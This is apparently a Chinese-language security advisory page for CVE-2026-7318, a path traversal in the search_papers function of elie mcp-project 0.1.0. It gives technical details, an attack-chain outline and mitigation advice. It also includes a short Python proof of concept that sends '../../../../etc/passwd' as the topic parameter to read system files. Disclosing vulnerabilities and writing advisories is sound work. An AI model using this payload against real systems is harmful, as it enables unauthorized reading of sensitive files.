CVE-2026-7318 CVSS 5.9 中危

CVE-2026-7318 elie mcp-project 路径遍历漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7318

漏洞类型

路径遍历

CVSS评分

5.9 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

elie mcp-project

漏洞概述

elie mcp-project 0.1.0版本存在路径遍历漏洞。该漏洞源于`research_server.py`文件中的`search_papers`函数对参数`topic`的处理不当。攻击者无需认证且无需用户交互，在本地环境下通过恶意构造参数即可利用此漏洞。由于漏洞利用代码已公开且厂商尚未修复，该风险对本地系统安全构成威胁。

技术细节

该漏洞根因在于elie mcp-project 0.1.0版本中`research_server.py`文件的`search_papers`函数未能正确处理用户输入。具体而言，函数直接将`topic`参数拼接至文件路径中，缺乏必要的路径规范化或白名单校验机制。这使得攻击者能够通过构造包含“../”序列或绝对路径的Payload，实施路径遍历攻击。攻击向量显示该漏洞利用需具备本地访问权限（AV:L），且无需认证（PR:N）和用户交互（UI:N）。一旦利用成功，攻击者可读取、修改或删除受影响目录之外的文件，造成信息泄露、完整性破坏及可用性下降。由于厂商尚未响应且PoC已公开，该漏洞对本地环境的安全隐患显著。

攻击链分析

STEP 1

侦察

攻击者确认目标系统本地运行着elie mcp-project 0.1.0版本。

STEP 2

构造攻击载荷

攻击者构造包含路径遍历字符（如'../'）的恶意字符串作为'topic'参数的值。

STEP 3

执行漏洞利用

攻击者在本地环境下调用`search_papers`函数，传入恶意参数，触发路径遍历。

STEP 4

达成攻击效果

成功读取或写入预期目录之外的文件，导致信息泄露或系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7318
# This script demonstrates the path traversal vulnerability in search_papers function.
import requests

target_url = "http://127.0.0.1:8000/search_papers"  # Example local endpoint

# Malicious payload trying to access sensitive files (e.g., /etc/passwd)
# Adjust the number of "../" based on the actual deployment depth
payload = "../../../../etc/passwd"

params = {
    "topic": payload
}

try:
    print(f"[+] Sending payload to {target_url}...")
    response = requests.get(target_url, params=params, timeout=5)
    
    if response.status_code == 200 and "root:" in response.text:
        print("[!] Vulnerability exploited successfully!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Exploit failed or target not vulnerable. Status: {response.status_code}")
        print(response.text[:200])
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

elie mcp-project 0.1.0

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议暂时限制该应用在敏感环境中的使用。对于必须使用的场景，应在应用部署前通过操作系统层面的权限控制（如Chroot、容器化隔离）或中间件（如WAF）严格限制对文件系统的访问，并拦截包含路径遍历特征的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7318
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7318
3 Details https://www.cvedetails.com/cve/CVE-2026-7318/
4 VulDB https://vuldb.com/cve/CVE-2026-7318
5 Link https://github.com/elie/mcp-research-server/issues/1
6 Link https://vuldb.com/submit/803083
7 Link https://vuldb.com/vuln/359971
8 Link https://vuldb.com/vuln/359971/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表